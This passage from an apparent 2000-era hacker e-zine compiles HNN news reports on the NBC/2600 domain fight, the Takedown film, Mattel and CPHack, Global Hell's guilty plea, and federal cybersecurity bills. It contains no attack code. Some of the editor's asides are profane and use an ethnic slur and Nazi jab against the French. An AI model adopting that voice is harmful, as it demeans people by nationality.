      However, during a recent board meeting in Cairo, Egypt, ICANN directors 
      didn't seem too receptive of such a plan, pointing out that critics of a 
      company already register domains containing those words, as in 
      "nbcisnotfair."

      Companies fighting back

      However, NBC's stance shows that companies are inclined to fight the use 
      of such domain names, even if their efforts thwart free speech.

      NBC joins a growing list of corporations going after not only 
      cybersquatters who violate their trademarks, but also sites that contain 
      content or domains they don't like. 

      But they haven't been too successful in the most public cases.

      In January, toy seller eToys Inc. (Nasdaq: ETYS) settled with Swiss art 
      group Etoy, which it had accused of trademark infringement, even though 
      the group had owned the domain before eToys existed.

      Also, Bally Total Fitness lost an attempt to go after the owners of a 
      domain critical of the company that contained the Bally name. 

      More 2600.org targets

      Meanwhile, 2600.org is still making mischief, saying it has received 
      many proposals to provide content for the f--knbc site and will pick the 
      best one. Right now, the site points to the NBC letter and 2600's side 
      of the story.

      "Etoy won their battle, and we believe others will follow if we stick 
      together and refuse to cave in," Goldstein said. Goldstein and his cohorts 
      also have registered the F--kingmorons.com domain name, which leads to the 
      Motion Picture Association of America -- a trade group that has sued 2600 
      and others, claiming their plans to crack the code that encrypts DVDs 
      violates laws protecting trade secrets and copyrights. 
                  
                  
      (Oh yeah, and btw, HWA sez FUCK YOU NBC! too ..d0rks - Ed)
      
      @HWA
      
128.0 HNN:Mar 28th:Takedown Debuts in France 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by lamer
      Securityfocus.com reports that Takedown, starring Skeet Ulrich as Kevin
      Mitnick, has been released in France as "Cybertraque." Reviews so far
      have been poor. The official movie web site and video clip can be
      found at www.cybertraque.com
      
      Security Focus
      
      http://www.securityfocus.com/news/10
      ----------
      
      (This must REALLY blow major chunkage to open in France... (!!?!?)... no
      futher comment on this one, we might get nuclear wasted by the dumb frogs
      fascist gestapo government... seig heil, besides the French mostly suck
      anyways...we all know this. - Ed)
      
      Mitnick Movie Opens in France

      "Takedown" movie finally premieres... dubbed in French. 

      By Kevin Poulsen 
      March 27, 2000 1:14 PM PST

      It may never make it to theatres in the English speaking world, but a 
      controversial motion picture based on the digital manhunt that snared 
      hacker Kevin Mitnick debuted in France this month, to generally poor 
      reviews and unspectacular box office receipts.

      The movie, from Miramax's genre label Dimension Films, is based on the 
      book "Takedown: The Pursuit and Capture of America's Most Wanted Computer 
      Outlaw -- By The Man Who Did It," authored by computer security 
      expert Tsutomu Shimomura and New York Times reporter John Markoff. 

      Shimomura electronically tracked Mitnick to his Raleigh, North Carolina 
      hideout in February, 1995, and sold the book and movie rights for an 
      undisclosed sum amidst the storm of publicity following the fugitive 
      hacker's arrest.

      Early versions of the screenplay for the movie adaptation of "Takedown" 
      cast Mitnick -- played by Scream star Skeet Ulrich -- as violent and 
      potentially homicidal. In July, 1998, supporters of the then-imprisoned 
      cyberpunk rallied against the film outside Miramax's New York City 
      offices. Writers later revised the script, and shooting wrapped on the 
      project in December, 1998. 

      Since then the film has languished without a US release date, amid rumors 
      of a direct-to-video or cable TV release. 

      The French-dubbed version of the 90 minute film is titled Cybertraque. It 
      opened on March 15th. A promotional web site features streaming video of 
      the theatrical trailer.

      Miramax publicists didn't return phone calls about the movie. The exact 
      box office take of Cybertraque is unknown, but receipts failed to crack 
      France's top-ten list on the movie's opening weekend. 

      French critics have generally panned the film. A review in the French 
      newspaper Le Monde notes the film's problems in translating a virtual 
      manhunt to the action-adventure genre. "Can the repeated image of 
      faces sweating over keyboards renew the principles of the Hollywood 
      thriller?," the paper asks. "It's easy to say that the filmmaker hardly 
      reaches that point, regardless of his saturation of the soundtrack with 
      rock music to defeat the boredom of the viewer." (translated)

      Mitnick cracked computers at cell phone companies, universities and ISPs. 
      He pleaded guilty in March, 1999, to seven felonies, and was released from 
      prison on January 21st, 2000, after nearly five years in custody. 

      Last month he testified before a Congressional committee on governmental 
      computer security.
      
      @HWA
      
129.0 HNN:Mar 28th:Mattel Buys Rights to CPHack 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by evenprime 
      CPhack, a program that allows people to defeat Cyber Patrol as well as
      lists all webs sites filtered by the software, has been bought by
      Mattel. The authors of the program have signed a seven page assignment
      agreement that gives Mattel "all rights" to the program's source code
      and binaries. The rights to the program were sold for one dollar and
      agreement to drop the lawsuit against them.
      
      Wired
      
      http://www.wired.com/news/politics/0,1283,35216,00.html
      ----------
      
      Mattel Stays on the Offensive by Declan McCullagh 

      2:45 p.m. Mar. 27, 2000 PST 

      BOSTON -- Upping the stakes in a battle over a utility that reveals 
      Cyberpatrol's list of off-limits websites, Mattel threatened mirror 
      sites with contempt charges during a court hearing Monday afternoon. 

      Mattel, which sells Cyberpatrol, said the toy giant had acquired the 
      copyright to "cphack" from the two cryptanalysts who published it on 
      their website earlier this month in a settlement agreement signed on March 
      24. 

      Citing a March 16 Slashdot thread that said "it's time to mirror!", Mattel 
      attorney Irwin Schwartz advised against anyone thinking of distributing 
      cphack from now on. 

      
      "They should be afraid of being hauled into court on contempt 
      proceedings," Schwartz told the judge. 

      Just 25 minutes before the hearing was scheduled to begin, Mattel filed 
      documents with the court saying it was ready to abandon its lawsuit over 
      cphack, which allows owners of Cyberpatrol to view the program's secret 
      encrypted blacklist. 

      As part of the agreement, Mattel said it wanted a permanent court order 
      that applied to mirror sites, too. 

      The American Civil Liberties Union, which is representing three mirror 
      sites, said it did not object to the lawsuit's dismissal -- but it wanted 
      to make sure its clients would not be at risk. 

      ACLU attorney Chris Hansen asked U.S. District Judge Edward Harrington to 
      exempt mirror sites from his order, saying Mattel could simply file 
      another suit if it suspected violations of its new copyright. 

      "My clients do not want to be put to the test of contempt," Hansen said. 

      Contempt citations could include fines or jail time. 

      At the end of the hearing, which lasted one hour, Harrington said he would 
      consider Hansen's request and decide by Wednesday. Harrington said he 
      would continue his earlier temporary restraining order until then. 

      But he indicated he was a little worried about an order that would apply 
      to people who aren't defendants, saying "they have not been heard." 

      The seven-page "assignment agreement" signed by cphack co-author Eddy 
      Jansson of Sweden gives Mattel "all rights" to the program's source code 
      and binaries and an explanatory essay he wrote. Co-author Matthew Skala of 
      Canada signed a similar agreement giving up his rights for one 
      dollar. 
      
      
      @HWA
      
130.0 HNN:Mar 28th:Cyber Security Bill Passes Committee 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      
      contributed by Evil Wench 
      S. 1993 has been approved by the Senate Governmental Affairs Committee
      last Thursday. The bill will provide "a comprehensive framework" for
      protecting federal computer records against cyber-attacks by outside
      attackers.
      
      Government Executive Magazine
      
      http://www.govexec.com/dailyfed/0300/032400b2.htm
      ----------
      
     March 24, 2000

     DAILY BRIEFING

     Senate panel approves cyber-security mandates

     By Spencer Rich, National Journal News Service

     The Senate Governmental Affairs Committee on Thursday approved legislation 
     (S. 1993) to provide "a comprehensive framework" for protecting federal 
     computer records against cyber-attacks by outside hackers.

     The bill also seeks to guard against unauthorized disclosures caused by 
     accidental or careless procedures in handling and protecting information.

     Co-sponsored by Committee Chairman Fred Thompson, R-Tenn., and Ranking 
     Democrat Joseph Lieberman of Connecticut, the bill passed by voice vote. 
     The Clinton Administration had worked with the committee to iron out some 
     issues in the original version of the bill, according to committee aides.

     When the bill was first introduced last Nov. 19, Thompson complained that 
     "federal agencies continue to use a band-aid approach to computer security 
     rather than addressing the systemic problems which make government systems 
     vulnerable to repeated computer attacks."

     "Hopefully, the recent breaches of security at the various 'dot.com' 
     companies is the wake-up call needed to focus attention on the security of 
     government computer systems," Thompson said.

     At that time, Lieberman also observed, "Government computers are rife with 
     sensitive information ... on national security, the strength of our 
     economy, transportation and communications systems and the personal lives 
     of millions of citizens" -- as well as the mechanisms for controlling 
     weapons of mass destruction, tracking the offensive movements of enemy 
     states and controlling the economy and threats to public health. All these 
     appeared vulnerable to computer hijacking, he said.

     Yet, Lieberman said, the General Accounting Office had found that a test 
     unit it set up could crack computerized information systems controlling 
     spacecraft and information gleaned by space exploration, obtain access to 
     State Department networks, veterans' records, tax records and benefit and 
     demographic information. In some cases, the test unit found it would have 
     been able to alter the information in these systems if it wanted to do 
     mischief, he said.

     Thompson said the weaknesses of the computer information system were 
     essentially a management issue.

     To correct this, the bill approved Thursday would set up a tight chain of 
     command and responsibility for strengthening and protecting computer 
     records. It would stretch from the director of the Office of Management 
     and Budget at the top to individual departments and agencies below. Each 
     one's progress in developing plans to strengthen computer security and 
     protecting information would be monitored periodically by an outside 
     agency, such as the GAO.

     Each government agency would have to develop a security plan, switch to 
     procedures identified as "best practices," and make sure the relevant 
     employees are properly informed and trained, under the bill.

     At the head of this chain of command would be the OMB director. Under him, 
     Thompson explained at Thursday's committee meeting, the deputy OMB director 
     for management "will be responsible for seeing that agencies do what they 
     should in non-defense areas," and the Secretary of Defense and the Director 
     of Central Intelligence would have similar responsibility with regard to 
     national security, defense and other "classified information systems." 

     "They must adopt programs and plans that will make us secure," Thompson 
     added.

     Thompson said the GAO would monitor the various computer security programs 
     at departments and agencies annually. "This will make it as secure as 
     possible," said Lieberman: "an annual plan and independent audit" of each 
     agency.

     According to the committee, the bill, as approved, would:

          * Establish clear federal agency accountability for information 
          security. 

          * Require each agency to have an annual independent evaluation. 

          * Give the Defense Secretary and CIA director responsibility for 
          national security and other classified information system security. 
          (Addition of this provision was one of the major changes made in the 
          original bill by the substitute text, staff aides said.) 

          * Give agency managers flexibility to attract the "best and brightest 
          technology talent through the use of scholarships, fellowships and 
          federal service agreements." (This was another major change made by 
          the substitute text, the aides said.) 

          * Focus on the importance of training programs. 

     An amendment by Sen. Daniel Akaka, D-Hawaii, added by voice vote, would 
     require agencies to report on the time periods and resources needed to 
     implement agencywide security programs.
      
      @HWA
      
131.0 HNN:Mar 28th:Census Gets NSA to Look at Security 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      
      contributed by Evil Wench 
      In an effort to protect the private information of millions of
      Americans the Commerce Department has asked the NSA to test its online
      security systems.
      
      Federal Computer Week
      
      http://www.fcw.com/fcw/articles/2000/0327/web-1census-03-27-00.asp
      ----------
     
      Census tests security 

      By Judi Hasson, 03/27/2000 

      The Census Bureau has hired a company to try to break into its 
      Internet site and brought in the super-secret National Security Agency to 
      test Census security systems. 

      Census officials said they are certain the data is safe but want to 
      make sure there are no vulnerable spots. 

      "Every day, people are scanning our ports. It's not just our site. 
      It's any site," said J. Gary Doyle, who is responsible for systems 
      integration at the Census Bureau. 

      Among the steps that the Census Bureau has taken to protect the 
      decennial count: 

           * Hiring the technology firm Science Applications International 
           Corp. to try to break into the Census' Internet site, where 
           respondents can file online. SAIC began working last week, and 
           there have been no reports of successful entry into the site. 

           * Enlisting NSA to make sure the site is secure. 

           * Erecting firewalls to prevent penetration. Among the precautions: 
           prohibiting e-mail from entering the site unless there is a 
           specific address on it and barring outside computers from dialing 
           up the census computer in the building. 

           * Encrypting all census data from the time it leaves a data scanning 
           center via a secure telephone line until it arrives at the Census 
           computer center in Bowie, Md. 

           * Making three copies of the data and storing it in different vaults. 

           * Providing backup systems at the Bowie computer center, including 
           generators and air conditioners. 

      The Census Bureau's precautions have gotten high marks from security 
      experts inside and outside government. 

      "Census is using all of the proper security practices," said Richard 
      Smith, vice president of federal operations at Internet Security 
      Systems Inc. "I would guess the likelihood of someone getting in is 
      small." 


      (Chant with me: "I hate faulty formatting routines ...down with buggy 
       software!" yeh I know, i'll do it myself one of these days, sure, right
       after I buy that MS stock ... -Ed)
      
      
      @HWA
      
132.0 HNN:Mar 28th:Icomlib 1.0.0 Final Released 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Javaman 
      Icomlib is an API for the ICOM PCR1000 computer controlled receiver
      for UNIX OS's. Currently it has been officially tested to support
      SunOS, *BSD, Slackware 7 Linux and SuSE Linux. Along with the API
      there is a GUI based on the Qt 2.x toolkit for X that supports
      multiple styles (CDE style, Motif style, Win95 style, SGI style). It
      also includes command line applications that implement all of the
      functions in the API, as well as additional functions like logging
      and log-hit scanning.
      
      Philtered
      
      http://www.philtered.net/projects.phtml
      ----------
      
      
      
      @HWA
      
133.0 HNN:Mar 28th:China Bans MP3s 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by lamer 
      In an effort to impose some sort of control over electronic commerce,
      China's Ministry of Culture has announced laws that ban online
      sales of imported music and videos and exclude foreign invested
      Internet companies from selling any audiovisual products. This of
      course would include MP3s.
      
      ABC News
      
      http://www.abcnews.go.com/sections/tech/DailyNews/china_mp3ban000325.html
      ----------
      
      @HWA
   
134.0 HNN:Mar 29th:MostHated to Plead Guilty 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by McIntyre 
      MostHated (Patrick W. Gregory) is expected to plead guilty to charges
      of one count of conspiracy to commit telecommunications fraud in the
      U.S. District Court of the Northern District of Texas. The charges
      stem from the defacement of the White House web page last May.
      MostHated is thought to be the leader of Global Hell, a group that has
      taken credit for defacing over 100 web sites. He could receive up to
      five years in prison, $250,000 in fines and be forced to pay up to $2.5
      million in restitution.
      
      ABC News
      Attrition.org - Mirrors of Global Hell Defacements
      
      http://abcnews.go.com/sections/tech/DailyNews/globalhell000329.html
      http://www.attrition.org/mirror/attrition/gh.html
      ----------
      
      March 29 -- The co-leader of a teenage cybergang that allegedly hacked
      into 115 Web sites is expected to plead guilty to conspiracy, marking a
      victory for the federal government in one of the biggest computer crimes
      cases yet.

      Patrick W. Gregory of Houston and dozens of his teenage cohorts defaced
      Web sites, deleted data and crashed servers, causing as much as $2.5
      million in damages, according to court documents.

      The group, which went by the names "total-Ka0s" and "Global Hell," became
      a national concern after officials said it hacked the White House site on
      May 9. The breach prompted the Secret Service temporarily to shut down
      White House access to the Internet while it scrambled to block the
      security flaw.

      The hackers replaced the government's site with the words, "Why did we
      hack this domain? Simple, we f***ing could."

      "What makes this so scary from a government standpoint is you've got a
      bunch of kids between 16 and 27 and all of a sudden they start getting on
      conference calls coordinating their attacks on company after company,
      just like them going down and vandalizing 14 houses on a block in a row,"
      said Matt Yarbrough, who was the lead federal prosecutor on the case and
      is now an e-commerce attorney for Vinson & Elkins of Dallas.

      "MostHateD"

      Gregory, 19, has agreed to plead guilty to one count of conspiracy to
      commit telecommunications fraud and computer hacking, according to
      documents filed in the U.S. District Court of Northern District of Texas.

      Gregory, who used the online moniker "MostHateD," has signed a plea
      agreement admitting he and other Global Hell members used the Internet to
      hack into 115 computer systems around the world between January 1997 and
      May 1999, the court documents say.

      He was expected to plead guilty in federal court in Dallas today but the
      hearing has been postponed, Assistant U.S. Attorney Reid Wittliff said.
      The plea hearing will likely be rescheduled for sometime in the next few
      weeks.

      He could receive up to five years in prison and $250,000 in fines. He
      could also be ordered to pay up to $2.5 million in restitution.

      "These people would have never come together in one place and been so
      coordinated if Patrick hadn't been the driving force behind that,"
      Yarbrough said. "Essentially, Patrick was the ringleader, the front man
      and media mind of Global Hell, and the scary force that scared the heck
      out of companies."

      In an exclusive interview with Brian Ross of ABC's 20/20 in December,
      Gregory said the White House and other victims should be thankful for
      Global Hell because the hackers used their computer genius to spot
      security loopholes in the computer system they target.

      "If you can get into the high security like that, you're going to be
      proud," Gregory said. "You had the knowledge to do something nobody else
      in the world could do."

      Hackers Plotted on Net

      Gregory admitted, in the plea agreement, to stealing telephone
      conferencing services from AT&T, MCI, Sprint and Latitude Communications
      worth tens of thousands of dollars.

      He and other members of Global Hell illegally acquired telephone numbers,
      personal identification numbers and credit card numbers and used them to
      hold hours of conference calls, during which they would discuss hacking,
      according to court documents.

      The group also discussed their hacking plans on Internet chat rooms,
      specifically on one called "#creep," the documents said.

      Once they gained unauthorized access to the computer systems, Gregory
      and the group's other members placed various codes, files, programs and
      services on them, the court papers said.

      "Global Hell Will Not Die"

      Typically, the hackers defaced the Web pages of the victims' sites,
      replacing them with text and graphics relating to "Global Hell." The U.S.
      Army's page, for example, was replaced with the message, "Global Hell is
      alive. Global Hell will not die."

      The hackers also intentionally deleted data and crashed some of the
      computer systems, causing hundreds of thousands of dollars in damages in
      some cases.

      "These damages were sometimes financial and sometimes intangible,
      including the loss of faith in the organizations and 'brand name' due to
      the public defacements of their Web sites," the plea agreement says.

      Authorities say Gregory personally participated in the hacking of at
      least three Web sites: 1688.com, the American Retirement Corp.'s site,
      and Blue Byte Software's site. After hacking into 1688.com, a design
      firm, on April 27, 1999, he stole banking information and e-mail
      passwords and posted them on the Internet, court documents say.

      Cohorts Convicted

      Two other Global Hell members have already been convicted.

      The Global Hell member who hacked into the White House, 19-year-old Eric
      Burns of Shoreline, Wash., pleaded guilty in federal court last November
      and was sentenced to 15 months in prison and ordered by the judge not to
      touch a computer for three years after that.

      Earlier this month, Chad Davis, 20, of Ashwaubenon, Wis., was sentenced
      to six months in prison for accessing and altering the Army's Web site.

      The judge also ordered that Davis pay $8,054 in restitution to the Army
      for the cost of restoring the Web site; serve three years of supervised
      release after the six-month prison term; not have contact with anyone
      from Global Hell; and gain approval from future employers to use the
      Internet.

      "If it's used wisely, it will carry you over the rainbow," U.S. District
      Judge J.P. Stadtmueller said of the Internet. "But you got yourself
      involved with something that took you down a very different path, causing
      a problem for one branch of government. This is a deadly serious
      business. It's not something that's a sandbox play tool."
      
      @HWA
      
135.0 HNN:Mar 29th:FBI Wants New Laws to Make Their Work Easier 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by acopalyse 
      FBI director Louis Freeh has suggested changes to the law that would
      help track down cyber criminals and make it easier to keep pace with
      the fastest-growing area of cyber crime in the United States.
      (Whhhaaaaa, my job is too hard, please pass some laws to make it
      easier.)
      
      C|Net
      
      http://news.cnet.com/news/0-1005-200-1595429.html?dtn.head
      ----------
      
      FBI cracks down on increasing cybercrimes
      By Reuters, Special to CNET News.com
      March 28, 2000, 12:40 p.m. PT

      WASHINGTON--The number of cybercrimes being investigated by the FBI has 
      doubled in the past year, and last month's attacks on leading Web sites 
      are the tip of the iceberg, FBI director Louis Freeh said today. 

      Addressing a Senate subcommittee of cybercrime, Freeh suggested changes to 
      the law that would help track down cybercriminals and make it easier to 
      keep pace with the fastest-growing area of crime in the United States. 

      In 1998, Freeh said the FBI opened 547 "computer intrusion" cases, and 
      this more than doubled to 1,154 last year. In 1998, the FBI closed 399 
      of those cases and 912 last year. 

      "In short, even though we have markedly improved our capabilities to 
      fight cyberintrusions, the problem is growing even faster," he told the 
      committee. 

      Cyberthreats included disgruntled employees, hackers who "cracked" into 
      networks for the thrill of it or for financial gain, and virus writers. 

      Criminal groups and terrorist organizations also used technology more to 
      raise funds, spread propaganda and communicate with each other. 

      Freeh declined to give details of the attacks last month on business Web 
      sites such as Yahoo, eBay and Amazon.com, as these are under 
      investigation. But he said the attacks were "the tip of the iceberg" and 
      demonstrated the ease with which such crimes could be committed. 

      Freeh said U.S. laws have not kept pace with fast-changing technology, 
      adding that the FBI is working with the Justice Department to propose a 
      legislative package to update laws. 

      Responding to his comments, Democratic Sen. Charles Schumer from New York 
      said laws are set up at a "sub-sonic" speed at a time when the process 
      should be faster than the speed of light. 

      Freeh said he does not want "extraordinary powers," just enough to deal 
      with the phenomenal changes that have accompanied the Internet. 

      One problem is that to track down a cybercriminal, court orders often have 
      to be issued in several states. "There is a needless waste of time and 
      resources, and a number of important investigations are either hampered or 
      derailed entirely in those instances," Freeh said. 

      The use of administrative subpoenas would enable investigators to work 
      more efficiently, he said. 

      Senators on the committee said some companies are reluctant to report 
      cybercrimes for fear of harming their stock prices. 

      The president of the Information Technology Association of America, Harris 
      Miller, told the committee that few high-tech firms are interested in 
      being seen by customers as active law enforcement agents. 

      "No company wants information to surface that they have given in 
      confidence that may jeopardize their market position, strategies, customer 
      base or capital investments," he said. 

      Asked about the cooperation of foreign governments, Freeh cited the United 
      States' close relationship with Canada. A couple of weeks ago, Freeh said 
      an FBI office in New Haven picked up an online statement from a youth who 
      said he felt like "shooting up a school." 

      A 14-year-old in a small Canadian town was tracked down and found to have 
      access to explosives and other weaponry. 

      Over the New Year's period, Freeh said he had close contact with Far East 
      and Middle Eastern countries and that FBI agents there had been given 
      access to computers and hard drives to investigate threats against 
      Americans. 

      Freeh said that he visited six areas in the Gulf recently, and all 
      mentioned cybercrime. "The Internet has no boundaries or sovereignty," he 
      said. 

      Story Copyright (c) 2000 Reuters Limited. All rights reserved.
      
      
      
      @HWA
      
      
136.0 HNN:Mar 29th:Banks Warned to Carefully Screen New Recruits 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by William Knowles 
      In preparation for the upcoming Stop the City protests London police
      are warning banks to be extra careful screening applicants and to look
      for people with 'cyber-spy tendencies'. Police fear that anarchist
      sympathizers may try to infiltrate companies and sabotage computer
      systems in support of the protests.
      
      The Register UK
      
      http://www.theregister.co.uk/000328-000016.html
      ----------
      
      Posted 28/03/2000 12:14pm by Linda Harrison

      Watch out! There's a Cyberterrorist about

      London police are warning banks to look out for cyber terrorists when 
      recruiting staff. 

      Anarchist sympathisers may try to infiltrate companies and sabotage 
      computer systems to help the anti-City protests expected in May, a 
      senior crime prevention officer said yesterday. 

      Norman Russell, head of the City of London police community safety branch, 
      said firms should grill new staff for any cyber-spy tendencies. 

      Job applicants who support the aims of anarchist umbrella group People's 
      Global Action might help demonstrators enter company buildings 
      during the forthcoming Stop the City protests. Alternatively, they could 
      insert viruses in computer files or leak passwords to let hackers 
      penetrate computer systems, the Mail on Sunday reports. 

      And Russell's advice to spot these saboteurs? 

      "Employers should make sure that they take up references of new 
      employees." 

      Sound advice. The Register has gone further, and compiled a few suspicious 
      comments to help employers when they are interviewing City slicker 
      applicants. 

      Anyone letting slip comments like "Bring the Capitalist dogs to their 
      knees!" Or "Cream the City fat cats!" should definitely be treated 
      with caution. 

      As should utterances along the lines of: "The roar of profit and plunder 
      will be replaced by the sounds of rhythms of party and pleasure as a 
      massive carnival of resistance snakes its way through the square mile." 
      (genuine quote - Reclaim the Streets). 

      But in case these cyber-saboteurs have become more CV-savvy, it may be as 
      well to develop your own techniques to pinpoint a likely candidate. 
      The Register welcomes any tips on how to spot a likely lord or lady of 
      misrule. 

      Meanwhile, a new nation has emerged to take the cyberwarfare crown. 
      According to Newsbytes, Canada is now a hotbed of cyberterrorism, 
      responsible for 80 per cent of foreign attacks on US computers. 

      FBI director Louis Freeh went so far as to describe this normally 
      law-abiding Mounty nation as a "hacker haven". 

      Related stories 

      Anarchists run riot on the Web 

      City faces up to hack attack 

      -=-

      
      Fuck i'm sick of seeing "Cyber" in all these lame stories ... - Ed
      
      @HWA
      
            
        
137.0 HNN:Mar 29th:CPHack Was GPL'd, Mattel Left Holding the Bag       
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Fredrick 
      Mattel may not have gotten exactly what it thought when it purchased
      the copyright to CPHack. CPHack reveals Cyberpatrol's secret list of
      off-limits web sites as well as methods to circumvent the program.
      CPHack was released under the GNU General Public License, which grants
      the recipient of the software the right to copy, distribute or modify
      the program. Legal experts say that that right cannot be revoked.
      
      Wired
      
      http://www.wired.com/news/politics/0,1283,35226,00.html
      
      ----------
      
      Mattel Suit Takes GNU Twist by Declan McCullagh 

      3:00 a.m. Mar. 28, 2000 PST 

      BOSTON -- Mattel's claim of victory Monday in a lawsuit over its 
      Cyberpatrol filtering software may be premature. 

      The toy giant said during a court hearing here that it had acquired 
      intellectual property rights to a program that reveals Cyberpatrol's 
      secret list of off-limits websites and settled the case. Mattel said it 
      planned to use its new copyright in court to ban Internet copying of 
      the "cphack" utility. 

      
      But cphack's authors released it under the GNU General Public License, 
      which appears to permit unlimited distribution of the original cphack 
      program, even if Mattel now owns the copyright. 

      "Once you do that you can't revoke it," said Bennett Haselton of 
      Peacefire, a group opposed to filtering software that temporarily put up 
      its own cphack mirror site. 

      The Free Software Foundation's GPL agreement says that "the recipient 
      automatically receives a license from the original licensor to copy, 
      distribute or modify the program." 

      Translation: A copyright holder can't change his mind. 

      "GPL is software that cannot be revoked," said Eben Moglen, a law 
      professor at Columbia University and FSF general counsel. "Anyone 
      downstream who possesses a copy of the software may redistribute it. 

      "It's a very amusing case," Moglen said. "If people are going to respond 
      to free software they don't like by trying to wipe it out, they're in for 
      some real trouble." 

      A spokeswoman for Mattel reached late Monday said she didn't know what the 
      effect of the GPL would be. 

      But she said cphack authors Eddy Jansson and Matthew Skala had signed a 
      contract with Mattel and if there was any deception, "they'd be in big 
      trouble." 

      The agreement with Jansson gives "all rights, if any" to the cphack source 
      and object code and accompanying essay to Mattel. 

      The agreement also states that Jansson and Skala attest they "are the sole 
      proprietors of all rights" involved with cphack and have "not assigned" 
      them to anyone else. 

      Even if Mattel cannot claim exclusive copyright in cphack, it may be able 
      to pursue lawsuits on other grounds.       
      
      

      @HWA
            
138.0 HNN:Mar 29th:White House Staffer Gives Away Phone Access Codes 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by William Knowles 
      For giving out long distance White House telephone access codes a U.S.
      Army Sergeant has been arrested. The codes allowed 9,400 calls worth
      $50,000 to be placed to locations around the world.
      
      Reuters - via Yahoo
      
      http://dailynews.yahoo.com/h/nm/20000327/tc/crime_whitehouse_1.html
      ----------
      
      See the ISN story.

      @HWA
            
139.0 HNN:Mar 29th:Another DVD Work Around on PlayStation 2 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by acopalyse 
      This time fans have discovered a way to exploit the game console's
      analog RGB output to copy DVD content to a videotape, circumventing
      the system's copy-protection technology. The technique is being
      discussed on Japanese web sites. (Wonder if this will have any impact
      on the current MPAA and DeCSS case.)
      
      TechWeb
      
      http://www.techweb.com/wire/story/TWB20000324S0007
      ----------
      
                  Second Backdoor Found In Playstation 2
                  (03/24/00, 3:44 p.m. ET) By Yoshiko Hara, EE Times 

                  Video enthusiasts in Japan have found a
                  second backdoor in Sony Computer
                  Entertainment's newly launched Playstation
                  2. 

                  This time, fans have discovered a way to exploit the
                  game console's analog RGB output to illegally copy
                  DVD content to a videotape, circumventing the
                  system's copy-protection technology. The technique is
                  being discussed on Japanese websites. 

                  The discovery of such a flaw is another blow to Sony,
                  already embarrassed earlier this month when users in
                  Japan found a way into Playstation 2 to subvert a
                  geographical code for DVD video disks. 

                  So far, the issue has not raised the ire of movie studios
                  or others in the consumer electronics industry.
                  However, it could accelerate a movement that's quietly
                  forming behind the scenes to develop a new copy
                  protection scheme for the legacy analog RGB interface
                  used both in Playstation 2 and on PCs. 

                  At issue is whether Sony Computer Entertainment has
                  violated a DVD industry agreement that prohibits DVD
                  players from having an analog RGB interface. If so, it's
                  possible that Hollywood studios could take some action
                  against Sony. 

                  But some in the industry pointed out this week that
                  Sony could make the case that Playstation 2 is not a
                  stand-alone DVD player, but a PC. Under the DVD
                  specs, PCs are permitted an RGB output. So far,
                  however, Sony has not resorted to this argument. 

                  Sony Computer Entertainment acknowledged on
                  Wednesday that problems with copy protection can
                  arise from the use of an analog RGB interface, but said
                  the company did nothing wrong and that the RGB
                  interface on the Playstation 2 complies with the DVD
                  specs. 

                  A company spokesman said Sony installed in
                  Playstation 2 appropriate means of preventing any
                  illegal analog-to-analog copying, by providing security
                  coding from Macrovision for all the system's output
                  interface signals: RGB, composite, component, and
                  S-video. For copy protection of analog RGB signals,
                  Sony worked with Macrovision to add Macrovision
                  code in RGB's synchronous signals, the Sony
                  spokesman said. 

                  Further, the game console comes with a cable that
                  outputs widely used composite video signals. An
                  optional cable outputs S-video signals and component
                  signals. In either case, these video signals are protected
                  by Macrovision technology, and taped images are
                  therefore of a substantially lower quality than the
                  originals. That means that nonhackers cannot readily
                  duplicate DVD video content, the spokesman said. 

                  However, anonymous sources have posted on various
                  websites the circuitry diagram and the model name of a
                  converter designed to turn analog RGB signals into
                  NTSC video signals. This converter is also capable of
                  inadvertently removing Macrovision code. 

                  Engineering executives at leading DVD hardware
                  manufacturers, who spoke on the condition of
                  anonymity, expressed frustration with the situation. They
                  said the DVD Copy Control Association (DVD CCA),
                  a licensing agency based in Morgan Hill, Calif., has
                  prohibited outfitting any DVD player with an analog
                  RGB output. The only exception is a Scart connector, a
                  21-pin connector used in Europe that includes RGB
                  output pins and comes with its own copy protection
                  measure. 

                  "DVD CCA is aware of the reports about this situation
                  and we are looking into it," a spokesman for the
                  association said. 

                  Meanwhile, Sony Computer Entertainment has not
                  given up its plan to deliver better picture quality for
                  displaying DVD images through an RGB output. The
                  company has proposed to the DVD Forum a new cable
                  specification featuring Sony's proprietary 12-pin
                  connector at both ends of the cable. This cable directly
                  conveys analog RGB signal from the Playstation 2
                  console to a TV set. Sony is currently the only company
                  selling TVs with a 12-pin input. 

                  So far, it is still unclear how the movie industry will
                  respond to the Playstation 2 issue. Studio executives
                  acknowledged this week that protecting against illegal
                  analog-to-analog copying via analog RGB output has
                  been a contentious dilemma for studios and the
                  computer industry. But most studios were hesitant to
                  complain about Playstation 2. 

                  When the DVD standard was first developed several
